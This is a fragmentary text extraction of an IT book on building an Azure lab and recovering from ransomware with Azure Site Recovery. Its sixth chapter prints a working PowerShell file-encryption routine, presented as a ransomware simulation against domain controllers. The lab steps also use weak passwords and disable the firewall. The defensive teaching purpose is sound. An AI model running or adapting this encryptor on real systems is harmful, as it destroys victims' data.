Professional Documents
Culture Documents
By Microsoft MVP’s:
Dave Kawula Cristal Kawula
Emile Cabot Cary Sun
John O’Neill Sr - rMVP
PUBLISHED BY
MVPDays Publishing
http://www.mvpdays.com
All rights reserved. No part of this book may be reproduced or transmitted in any form or by any
means without the prior written permission of the publisher.
ISBN: TBD
Feedback Information
We’d like to hear from you! If you have any comments about how we could improve the quality
of this book, please don’t hesitate to contact us by visiting www.checkyourlogs.net or sending an
email to dave@mvpdays.com.
iii
Acknowledgments
Foreword by
Acknowledgments
From Dave
Cristal, you are my rock and my source of inspiration. For the past 20 + years you have been
there with me every step of the way. Not only are you the “BEST Wife” in the world you are my
partner in crime. Christian, Trinity, Keira, Serena, Mickaila, Mackenzie, and Rycker, you kids, are
so patient with your dear old dad when he locks himself away in the office for yet another book.
Taking the time to watch you grow in life, sports, and become little leaders of this new world is
incredible to watch.
Thank you, Mom and Dad, (Frank and Audry) and my brother Joe. You got me started in this
crazy IT world when I was so young. Brother, you mentored me along the way both coaching me
in hockey and helping me learn what you knew about PCs and Servers. I’ll never forget us as
teenage kids working the IT Support contract for the local municipal government. Remember
dad had to drive us to site because you weren’t old enough to drive ourselves yet. A great
career starts with the support of your family, and I’m so lucky because I have all the support one
could ever want.
Last but not least, the MVPDays volunteers, you have donated your time and expertise and
helped us run the event in over 20 cities across North America. Our latest journey has us
expanding the conference worldwide as a virtual conference. For those of you that will read this
book, your potential is limitless just expand your horizons, and you never know where life will
take you.
iii
About the Authors
Dave is well-known in the community as an evangelist for Microsoft, 1E, and Veeam
technologies. Locating Dave is easy as he speaks at several conferences and sessions each year,
including TechEd, Ignite, MVP Days Community Roadshow, and VeeamOn.
Recently Dave has been honored to take on the role of Conference Co-Chair of TechMentor with
fellow MVP Sami Laiho. The lineup of speakers and attendees that have been to this conference
over the past 20 years is fantastic. Come down to Redmond or Orlando in 2018, and you can
meet him in person. Checkout his speaking site at www.davekawula.com
He recently tied for 1st place out of 1800 speakers at the Microsoft Ignite Conference in Orlando.
As the founder and Managing Principal Consultant at TriCon Elite Consulting, Dave is a leading
technology expert for both local customers and large international enterprises, providing optimal
guidance and methodologies to achieve and maintain an efficient infrastructure.
BLOG: www.checkyourlogs.net
Twitter: @DaveKawula
iv
About the Authors
Cristal can be found speaking at Microsoft Ignite, MVPDays, and other local user groups. She is
extremely active in the community and has recently helped publish a book for other Women
MVP’s called Voices from the Data Platform.
This year at Microsoft Ignite she lead community meetups for various topics such as Women in
IT, Parenting in IT, Diversity in Tech, and becoming a Community Rockstar.
BLOG: http://www.checkyourlogs.net
Twitter: @supercristal1
v
About the Authors
He actively volunteers as a member of the Canadian Ski Patrol, providing over 250 hours each
year for first aid services and public education at Castle Mountain Resort and in the community.
BLOG: http://www.checkyourlogs.net
Twitter: @ecabot
vi
About the Authors
Cary Sun is CISCO CERTIFIED INTERNETWORK EXPERT (CCIE No.4531) and MCSE, MCIPT, Citrix
CCA with over twenty years in the planning, design, and implementation of network technologies
and Management and system integration. Background includes hands-on experience with multi-
platform, all LAN/WAN topologies, network administration, E-mail and Internet systems, security
products, PCs and Servers environment. Expertise is analyzing user’s needs and coordinating
system designs from concept through implementation. Exceptional analysis, organization,
communication, and interpersonal skills. Demonstrated ability to work independently or as an
integral part of a team to achieve objectives and goals. Specialties: CCIE /CCNA / MCSE / MCITP /
MCTS / MCSA / Solution Expert / CCA
Cary’s is a very active blogger at checkyourlogs.net and always available online for questions
from the community. He passion for technology is contagious, and he makes everyone around
him better at what they do.
Blog:http://www.checkyourlogs.net
Twitter:@SifuSun
vii
About the Authors
viii
Contents
Contents
Contents........................................................................................................................ ix
Introduction ................................................................................................................. 14
Chapter 1...................................................................................................................... 17
Chapter 2...................................................................................................................... 24
ix
Contents
Chapter 3...................................................................................................................... 88
Chapter 4...................................................................................................................... 95
x
Contents
xi
Contents
Reset Settings for your Azure Site Recovery Hyper-V Host................................ 157
Enable Diagnostic Logging for Azure Site Recovery........................................... 162
Zero Day time to Failover ........................................................................................ 163
Assuming an Admin Level breach Failing over 100 % to Azure .......................... 163
Executing a PowerShell based Ransomware Attack on Domain Controllers. ..... 163
Encrypting the Sysvol Folder .............................................................................. 165
Taking Down Production Killing Domain Controllers with Ransomware .............. 171
Encrypting the Active Directory Database .......................................................... 171
Survival Mode Recovering to Azure ........................................................................ 178
Tick Tock time to make a decision – We are Recovering to Azure ..................... 179
Performing the Double Swing Recovery ............................................................. 180
Join us at MVPDays and meet great MVP’s like this in person .............................. 189
Live Presentations .................................................................................................. 189
Video Training......................................................................................................... 189
Live Instructor-led Classes ...................................................................................... 190
Consulting Services ................................................................................................ 190
xii
Contents
xiii
Introduction MVPDays Online
Introduction
MVPDays Online
The purpose of this book is to showcase the fantastic expertise of our guest speakers of
MVPDays Online. They have so much passion, expertise, and expert knowledge that it only
seemed fitting to write it down in a book.
MVPDays was founded by Cristal and Dave Kawula back in 2013. It started as a simple idea;
“There’s got to be a good way for Microsoft MVPs to reach the IT community and share their
vast knowledge and experience in a fun and engaging way” I mean, what is the point in
recognizing these bright and inspiring individuals, and not leveraging them to inspire the
community that they are a part of.
Anyone that has an interest in technology is eager to learn and wants to meet other like-minded
individuals. This Roadshow is not just for Microsoft MVP’s it is for anyone in the IT Community.
Make sure you check out the MVPDays website at www.mvpdays.com. You never know maybe
the roadshow will be coming to a city near you.
The goal of this particular book is to show you how to survive a Ransomware Attack using Azure
Site Recovery. Each chapter is broken down into a unique tip, and we hope you find some
immense value in what we have written.
14
Introduction MVPDays Online
Sample Files
All sample files for this book can be downloaded from www.checkyourlogs.net and
https://github.com/dkawula/Surviving-a-Ransomware-Attack-Using-Azure-Site-Recovery
Additional Resources
In addition to all the tips and tricks provided in this book, you can find extra resources like
articles and video recordings on our blog http://www.checkyourlogs.net
15
Introduction MVPDays Online
16
Chapter 1 Setting up your Azure Subscription from Scratch
Chapter 1
If you are a newcomer on Microsoft Azure, no worry, I am going to show you how to create
Azure free account with $200 credit today, follow the steps as below.
17
Chapter 1 Setting up your Azure Subscription from Scratch
3. If you have an account with Microsoft already (e.g., office 365, outlookf.com …. ), enter
your email address and then click Next. If you don’t have Microsoft account, please click
Crete one.
4. If your email address is used with more than on account from Microsoft, you need to
select which account do you want to use.
18
Chapter 1 Setting up your Azure Subscription from Scratch
19
Chapter 1 Setting up your Azure Subscription from Scratch
6. On the About you page, enter your personal information and then click Next.
7. On the Identity verification by card page, you need to enter your credit card information
and then click Next. Don’t worry, Microsoft won’t charge you until you upgrade your free
20
Chapter 1 Setting up your Azure Subscription from Scratch
8. On the Agreement page, select I agree to the subscription agreement, offer details, and
privacy statement and I would like information, tips, and offers from Microsoft or
selected partners about Azure, including Azure Newsletter, Pricing updates, and other
21
Chapter 1 Setting up your Azure Subscription from Scratch
9. Congratulation! You’re ready to start with Azure and get $250 create for free. You need
to click Go to the portal and enjoy Azure features there.
10. That’s it you have now successfully setup your first Azure Tenant and have access to the
Azure Portal.
22
Chapter 1 Setting up your Azure Subscription from Scratch
23
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
Chapter 2
24
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
3. On the Create a virtual machine page, click Basics and select your Azure Subscription to
pay for this virtual machine.
4. Select Create new under the Resource group and enter resource group name, I will
recommend it as your virtual machine name, because it will easy to maintain your
25
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
5. Virtual Machine Name: Enter Virtual Machine Name as your resource group name.
Region: Select Region for the virtual machine. For my case, I am using West US 2.
Availability options: keep the default setting
Image: select Windows Server 2016 Datacenter
Size: click change size and select the Dv3 and Ev3 VM sizes. Because we need to enable
nested virtualization.
Username: Enter login user name
Password: Enter login password
26
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
27
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
28
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
7. On the Create a new disk page, settings as follow and then click OK.
Disk type: Select Premium SSD
Name: keep the default name
Size(GiB): 4095
Source type: None
29
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
Virtual network: Select vnet if you have existing vnet if not, you can keep the default
settings.
Subnet: Select subnet name if you have an existing subnet; if not, you can keep the
default settings.
Public IP: click Create new
30
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
31
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
Accelerated networking: On
1. On the Create a virtual machine page, click Management and keep the settings as
default.
32
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
11. On the Create a virtual machine page, click Guest config and keep the settings as default.
12. On the Create a virtual machine page, click Tags and keep the settings as default.
33
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
13. On the Create a virtual machine page, click Review + create and make sure Validation
passed and then click Create.
34
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
35
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
36
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
7. Change assignment setting from Dynamic to Static, and then click Save.
9. On the Add IP configuration page, settings as follow and then click OK.
37
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
Name: ipconfig2
IP address: 10.10.1.9
SKU: Basic
38
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
SKU: Basic
39
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
40
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
12. Repeat Add IP configurations steps If you need more public IP addresses.
41
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
2. Open Disk Management to partition and format for your new 4TB storage space. (Use
ReFS + 64 KB Block Size.)
42
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
43
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
5. On the Select installation type, select Role-based or feature-based installation and then
click Next.
44
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
7. On the Select server roles page, select Hyper-V, click Add Features and then click Next.
45
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
10. On the Create Virtual Switches page, don’t select any interface and click Next.
46
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
12. On the Default Stores page, you can change the default location to your new 4TB storage
space and then click Next.
47
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
13. On the Confirm installation selections page, select Restart the destination server
automatically if required and then click install.
48
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
49
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
To configure NAT Networking, we need to create an Internal Virtual Switch for nested guest VMs.
In general, there are two options for networking with nested virtual machines, MAC Address
Spoofing, and NAT networking. Unfortunately, MAC Address Spoofing is not possible in a public
cloud environment. So, If you are using an Azure virtual machine network interface as your
Hyper-V external virtual switch and have assigned it to nested guest VMS, the guest VMs won’t
be able to access the Internet. At this point, we have no choice, but to use NAT networking.
The steps below show how to configure a NetNat Virtual Switch with a single Public IP Address.
1. We can create an internal virtual switch and create NAT rules via Powershell cmdlet as
follow:
50
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
51
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
52
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
These steps allow us to add as many External Public IP Addresses in Azure and NAT them into our
Lab Virtual Machines. This gives you the most realistic lab experience possible.
2. Open Command prompt and run ipconfig /all and then write down the DNS IP address.
3. Add all of the IP addresses to the Azure Virtual Machine network interface, for my case
are 10.10.1.8-10
53
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
4. Re-run ipconfig /all again, and you will now see all of IP addresses under the network
interface.
54
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
55
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
7. Change switch name to NAT Network Switch and then click OK.
56
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
To configure Port Forwarding (NAT) into our lab we will use the Built-In Routing and Remote
Access role in Windows. The steps below will walk you through the configuration required.
58
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
14. Right-click the server name and select Configure and Enable Routing and Remote Access.
59
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
16. On the Configuration page, select Network address translation (NAT), click Next.
60
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
17. On the NAT Internet Connection page, select Ethernet 2 as public Interface, click Next.
61
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
18. On the Name and Address Translation Services page, select Enable basic name and
address services, click Next.
62
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
63
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
64
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
65
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
66
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
4. Enter IP addresses and mask and click OK, those IP addresses are being created with
Public IP addresses at the azure portal.
67
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
6. Settings as follow for TCP port 443 port forwarding and then click OK.
Description of Services: TCP443-10.10.1.10
On this address pool entry: 10.10.1.10
Protocol: TCP
Incoming port: 443
Private IP address: 192.168.100.99
68
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
69
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
8. You can repeat steps to create it for port 80 and port 3389 as well.
70
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
71
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
2. On the Server Manager page, select Local Server and then select Windows Firewall Public
ON, Private On.
72
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
4. On the customize page, select turn off Windows Firewall on Private Network and Public
Network and then click OK.
73
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
74
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
3. On the Virtual machines page, select the Virtual machine which you are using as Hyper-V
host.
75
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
76
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
6. On the Add inbound security rule, change Destination port rages to 443, Protocol to TCP,
Name to Port_443 and then click Add.
77
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
78
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
79
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
1. Create a Guest Virtual Machine on the Nested Azure Host (VM). Make sure the network
adapter is configured to use the NAT Network Switch, and assign IP address of
192.168.100.99/24, the default gateway is 192.168.100.1, you can use the 8.8.8.8 as
DNS.
80
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
81
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
2. Enable remote desktop for test RDP (TCP port 3389) and turn off Windows firewall.
3. Install IIS features on this machine. If you would like to test SSL (Port 443) setup and
configure the SSL Certificate in IIS.
82
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
5. If you can successfully connect your NAT Rules are working through the Azure NSG and
also through the RRAS configuration on the Nested Host in Azure.
6. Next, test Port 80 from the internet via (GDMCALABHV1-PublicIP3), and it will show you
the default IIS website. This also validates that the Port Forwarding is working.
83
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
7. Last you can validate the NAT Session Mapping on the Azure Nested Host (VM) using the
Routing and Remote Access tool.
84
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
In the steps below we will show you how to bulk configure rules using PowerShell.
$Port=1000
$HostInterfaceName="Ethernet 4"
$Protocol="TCP"
$PublicIP="10.10.1.101"
$PrivateIP="192.168.100.101"
for ($Port=1000; $Port -le 1010; $Port++)
{netsh routing ip nat add portmapping name=$HostInterfaceName proto=$Protocol
publicip=$PublicIP publicport=$Port privateip=$PrivateIP privateport=$Port
}
This will create a Custom Service (NAT Rule) in Routing and Remote Access on Interface Ethernet
4, TCP, Ports 1000-1010.
85
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
You can also run netsh routing dump to see the output.
Overall, this is an easy way to automate the creation of the NAT Rules for your lab.
86
Chapter 2 Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure
87
Chapter 3 Using BigDemo to Build your Lab
Chapter 3
88
Chapter 3 Using BigDemo to Build your Lab
89
Chapter 3 Using BigDemo to Build your Lab
90
Chapter 3 Using BigDemo to Build your Lab
2. Open an administrative
Invoke-WebRequest -Uri "
PowerShell prompt and https://raw.githubusercontent.com/dkawula/Surviving-
a-Ransomware-Attack-Using-Azure-Site-
type: Recovery/master/BigDemo_ASR_WAC.ps1" -OutFile
"C:\Post-Install\BigDemo_ASR_WAC.PS1"
91
Chapter 3 Using BigDemo to Build your Lab
5. Copy
BigDemo_Insider.PS1
from C:\Post-Install to
F:\DCBuild_Insider
6. Open
BigDemo_Insider.PS1
with the PowerShell ISE
edit lines 425 and 434
putting in Your Product
key received with the
EVAL Version of Windows
Server 2016 Downloaded
above
92
Chapter 3 Using BigDemo to Build your Lab
Save
BigDemo_Insider.PS1
8. Open an administrative
PowerShell prompt. Run
BigDemo_Insider.PS1
WorkingDir:
f:\DCBuild_Insider
Organization: MVPDays
Rockstars
TimeZone: Mountain
Standard Time
AdminPassword:
P@ssw0rd
DomainName:
MVPDays.com
DomainAdminPassword:
93
Chapter 3 Using BigDemo to Build your Lab
P@ssw0rd
VirtualSwitchName:
MVPDays_VMM_VSwitch
Subnet: 172.16.100.
ExtraLabFiles: C:\
9. It will take
approximately 1 hour
to build the Lab
Environment
With BigDemo you can create a new Lab Environment on demand. This script has built out
Active Directory, DHCP, DNS, and the other core infrastructure components required to get
started with your lab.
94
Chapter 4 Configuring Windows Admin Center
Chapter 4
Function Install-WindowsAdminCenter {
param
(
[string]$VMName,
[string]$GuestOSName,
[string]$VMPath,
[string]$WorkingDir
)
95
Chapter 4 Configuring Windows Admin Center
1. Logon to Management01
as Administrator
96
Chapter 4 Configuring Windows Admin Center
1. Logon to Management01
as Administrator
97
Chapter 4 Configuring Windows Admin Center
98
Chapter 4 Configuring Windows Admin Center
6. Click on Management01
8.
99
Chapter 4 Configuring Windows Admin Center
1. Logon to Management01
as Administrator
100
Chapter 4 Configuring Windows Admin Center
101
Chapter 4 Configuring Windows Admin Center
102
Chapter 4 Configuring Windows Admin Center
103
Chapter 4 Configuring Windows Admin Center
1. Logon to Management01
as Administrator
104
Chapter 4 Configuring Windows Admin Center
5. Click on Mangement01
105
Chapter 4 Configuring Windows Admin Center
106
Chapter 4 Configuring Windows Admin Center
107
Chapter 4 Configuring Windows Admin Center
108
Chapter 4 Configuring Windows Admin Center
109
Chapter 4 Configuring Windows Admin Center
1. Logon to Management01
as Administrator
110
Chapter 4 Configuring Windows Admin Center
111
Chapter 4 Configuring Windows Admin Center
1. Logon to Management01
as Administrator
112
Chapter 4 Configuring Windows Admin Center
5. Click on Mangement01
113
Chapter 4 Configuring Windows Admin Center
114
Chapter 4 Configuring Windows Admin Center
115
Chapter 4 Configuring Windows Admin Center
116
Chapter 4 Configuring Windows Admin Center
117
Chapter 4 Configuring Windows Admin Center
118
Chapter 4 Configuring Windows Admin Center
1. Logon to Management01
as Administrator
119
Chapter 4 Configuring Windows Admin Center
5. Click on drtitan01
120
Chapter 4 Configuring Windows Admin Center
121
Chapter 4 Configuring Windows Admin Center
122
Chapter 4 Configuring Windows Admin Center
123
Chapter 4 Configuring Windows Admin Center
16.
124
Chapter 4 Configuring Windows Admin Center
3.
125
Chapter 4 Configuring Windows Admin Center
126
Chapter 5 Windows Defender Advanced Threat Protection ATP
Chapter 5
Windows Defender Advanced Threat Protection (ATP) is an extremely useful add-on to help
protect your Windows Servers. This tool gives the capabilities of Windows Defender that is
included with Windows Server 2019.
In this chapter, we will give a brief overview of some of the features. To start things off, you will
need to sign up for a trial here: https://www.microsoft.com/en-
us/WindowsForBusiness/windows-atp?ocid=docs-wdatp-portaloverview-abovefoldlink
127
Chapter 5 Windows Defender Advanced Threat Protection ATP
1. Browse to
https://securitycenter.win
dows.com/dashboard
2. Log in with your Admin
Credentials
128
Chapter 5 Windows Defender Advanced Threat Protection ATP
6. Download the
Deployment Package to
the Target Server
Management 01
7. Open an Administrative
Command Prompt and
run
WindowsDefenderATPLoc
alOnboardingSCript.cmd
8. Wait approximately 5
minutes and check the
machines List in the Portal
129
Chapter 5 Windows Defender Advanced Threat Protection ATP
1. Browse to
https://securitycenter.win
dows.com/dashboard
2. Log in with your Admin
Credentials
130
Chapter 5 Windows Defender Advanced Threat Protection ATP
131
Chapter 5 Windows Defender Advanced Threat Protection ATP
132
Chapter 6 Simulating a Ransomware Attack
Chapter 6
Simulating a Ransomware
Attack
RanSim will simulate 13 ransomware infection scenarios and 1 crypto mining infection scenario
and show you if a workstation is vulnerable.
133
Chapter 6 Simulating a Ransomware Attack
134
Chapter 6 Simulating a Ransomware Attack
135
Chapter 6 Simulating a Ransomware Attack
8. On the KnowBe4
Ransomware Simulator
window click launch
136
Chapter 6 Simulating a Ransomware Attack
137
Chapter 6 Simulating a Ransomware Attack
138
Chapter 6 Simulating a Ransomware Attack
139
Chapter 6 Simulating a Ransomware Attack
140
Chapter 6 Simulating a Ransomware Attack
A new Feature with Windows Server 2019 is Ransomware Protection. In the following steps, we
will re-run the tests with Ransomware Simulator Ransim and see the output.
141
Chapter 6 Simulating a Ransomware Attack
142
Chapter 6 Simulating a Ransomware Attack
143
Chapter 6 Simulating a Ransomware Attack
144
Chapter 6 Simulating a Ransomware Attack
The code below is only to be used for testing purposes. DO Not run this in a production
environment. None of the authors of this book take any responsibility for your actions.
Windows Defender will not pick this attack up because it was executed with Administrative
Credentials. This means that in this case, you are now the victim of a Ransomware Attack.
#global variables
$csv = "C:\windows\temp\drives.csv"
Function Encrypt-File
{
Param([Parameter(mandatory=$true)][System.IO.FileInfo]$FilesToEncrypt,
[Parameter(mandatory=$true)][System.Security.Cryptography.X509Certificates.X509C
ertificate2]$Cert)
Try {
[System.Reflection.Assembly]::LoadWithPartialName("System.Security.Cryptography"
) }
Catch { Write-Error "Could not load required assembly."; Return }
$AesProvider = New-Object
System.Security.Cryptography.AesManaged
$AesProvider.KeySize = 256
$AesProvider.BlockSize = 128
$AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC
$KeyFormatter = New-Object
System.Security.Cryptography.RSAPKCS1KeyExchangeFormatter($Cert.PublicKey.Key)
[Byte[]]$KeyEncrypted =
$KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType())
145
Chapter 6 Simulating a Ransomware Attack
[Byte[]]$LenKey = $Null
[Byte[]]$LenIV = $Null
[Int]$LKey = $KeyEncrypted.Length
$LenKey = [System.BitConverter]::GetBytes($LKey)
[Int]$LIV = $AesProvider.IV.Length
$LenIV = [System.BitConverter]::GetBytes($LIV)
$FileStreamWriter
Try { $FileStreamWriter = New-Object
System.IO.FileStream("$($env:temp+$FilesToEncrypt.Name)",
[System.IO.FileMode]::Create) }
Catch { Write-Error "Unable to open output file for writing."; Return }
$FileStreamWriter.Write($LenKey, 0, 4)
$FileStreamWriter.Write($LenIV, 0, 4)
$FileStreamWriter.Write($KeyEncrypted, 0, $LKey)
$FileStreamWriter.Write($AesProvider.IV, 0, $LIV)
$Transform = $AesProvider.CreateEncryptor()
$CryptoStream = New-Object
System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform,
[System.Security.Cryptography.CryptoStreamMode]::Write)
[Int]$Count = 0
[Int]$Offset = 0
[Int]$BlockSizeBytes = $AesProvider.BlockSize / 8
[Byte[]]$Data = New-Object Byte[] $BlockSizeBytes
[Int]$BytesRead = 0
Try { $FileStreamReader = New-Object
System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open)
}
Catch { Write-Error "Unable to open input file for reading."; Return }
Do
{
$Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes)
$Offset += $Count
$CryptoStream.Write($Data, 0, $Count)
$BytesRead += $BlockSizeBytes
}
While ($Count -gt 0)
$CryptoStream.FlushFinalBlock()
$CryptoStream.Close()
$FileStreamReader.Close()
$FileStreamWriter.Close()
copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination
$FilesToEncrypt.FullName -Force
}
Exit
146
Chapter 6 Simulating a Ransomware Attack
147
Chapter 6 Simulating a Ransomware Attack
8. Then Grab the files from $FilesToEncrypt = Get-ChildItem -recurse -Force -Path
$FolderBrowser.SelectedPath | Where-Object {
the folder !($_.PSIsContainer -eq $true) } | % {$_.FullName} -
ErrorAction SilentlyContinue
$FilestoEncrypt
[Parameter(mandatory=$true)][System.Security.Cryptogr
aphy.X509Certificates.X509Certificate2]$Cert)
Try {
[System.Reflection.Assembly]::LoadWithPartialName("Sy
stem.Security.Cryptography") }
Catch { Write-Error "Could not load required
assembly."; Return }
148
Chapter 6 Simulating a Ransomware Attack
$AesProvider = New-Object
System.Security.Cryptography.AesManaged
$AesProvider.KeySize = 256
$AesProvider.BlockSize = 128
$AesProvider.Mode =
[System.Security.Cryptography.CipherMode]::CBC
$KeyFormatter = New-Object
System.Security.Cryptography.RSAPKCS1KeyExchangeForma
tter($Cert.PublicKey.Key)
[Byte[]]$KeyEncrypted =
$KeyFormatter.CreateKeyExchange($AesProvider.Key,
$AesProvider.GetType())
[Byte[]]$LenKey = $Null
[Byte[]]$LenIV = $Null
[Int]$LKey =
$KeyEncrypted.Length
$LenKey =
[System.BitConverter]::GetBytes($LKey)
[Int]$LIV =
$AesProvider.IV.Length
$LenIV =
[System.BitConverter]::GetBytes($LIV)
$FileStreamWriter
Try { $FileStreamWriter = New-Object
System.IO.FileStream("$($env:temp+$FilesToEncrypt.Nam
e)", [System.IO.FileMode]::Create) }
Catch { Write-Error "Unable to open output file
for writing."; Return }
$FileStreamWriter.Write($LenKey, 0, 4)
$FileStreamWriter.Write($LenIV, 0, 4)
$FileStreamWriter.Write($KeyEncrypted, 0,
$LKey)
$FileStreamWriter.Write($AesProvider.IV, 0, $LIV)
$Transform =
$AesProvider.CreateEncryptor()
$CryptoStream = New-Object
System.Security.Cryptography.CryptoStream($FileStream
Writer, $Transform,
[System.Security.Cryptography.CryptoStreamMode]::Writ
e)
[Int]$Count = 0
[Int]$Offset = 0
[Int]$BlockSizeBytes =
$AesProvider.BlockSize / 8
[Byte[]]$Data = New-Object Byte[]
$BlockSizeBytes
[Int]$BytesRead = 0
Try { $FileStreamReader = New-Object
System.IO.FileStream("$($FilesToEncrypt.FullName)",
[System.IO.FileMode]::Open) }
Catch { Write-Error "Unable to open input file
for reading."; Return }
Do
{
$Count = $FileStreamReader.Read($Data, 0,
$BlockSizeBytes)
$Offset += $Count
$CryptoStream.Write($Data, 0, $Count)
149
Chapter 6 Simulating a Ransomware Attack
$BytesRead += $BlockSizeBytes
}
While ($Count -gt 0)
$CryptoStream.FlushFinalBlock()
$CryptoStream.Close()
$FileStreamReader.Close()
$FileStreamWriter.Close()
copy-Item -Path $($env:temp+$FilesToEncrypt.Name)
-Destination $FilesToEncrypt.FullName -Force
}
150
Chapter 6 Simulating a Ransomware Attack
151
Chapter 7 Recovering from Ransomware using Azure Site Recovery
Chapter 7
So what is air gapped backup anyways? Here is what Wikipedia has to say:
An air gap, air wall or air gapping is a network security measure employed on one or more
computers to ensure that a secure computer network is physically isolated from unsecured
networks, such as the public Internet or an unsecured local area network. It means a computer or
network has no network interfaces connected to other networks, with a physical or conceptual air
gap, analogous to the air gap used in plumbing to maintain water quality.
In lay man’s terms, it means that you must keep a copy of you Backups and replicas offline.
2. Then once replication completes it turns off the Source Virtual Machine
152
Chapter 7 Recovering from Ransomware using Azure Site Recovery
3. At this point, it takes one final sync to capture the remaining changes. This can only be done
once the Virtual is off. Think of a SQL Server or Exchange Server that were processing
transactions during the 1st sync. The system cannot guarantee all of the records are there
until the Virtual Machine is off. That is why it shuts down the source machine to complete
the final delta sync.
4. Once the Sync is completed the Virtual Machine is powered on in your Microsoft Azure
Tenant.
Why will this not work in a Ransomware Situation? Because if the source machine was infected
and the files were encrypted you just too the encrypted files up to Azure and turned on the
Virtual Machine.
1. The steps to perform Failover Now are easier and faster than a planned failover. First, you
choose the Virtual Machine from the Azure Recovery Vault.
4. Turn on the VM
The total amount of time to turn on an air gapped replica virtual machine is minutes.
Site Recovery jobs are still bringing the nonviable recovery points into your vault. If you out run
the number of restore points and all you have is infected or cryptoed files, then Azure Site
Recovery was pointless.
Earlier in the book, we showed you what an admin level ransomware attack looked like for core
infrastructure roles like Domain Controllers. What this means for you is that you must keep
tight control and maintain the “Air Gap” between your on-prem infrastructure and the cloud.
Once you have safely recovered to a previous recovery point and cleaned up the on-prem side at
that point, you will be able to setup a Site-to-Site VPN to give users access.
Dear CEO,
I think it is the time that we notify the public of the breach that has occurred on 04/13/2019.
None of our services will be viable for the next foreseeable future. You should look at issuing a
public statement and having our teams contact our business partners. Those million dollar
shipment of supplies will not be arriving on time. Blah Blah
154
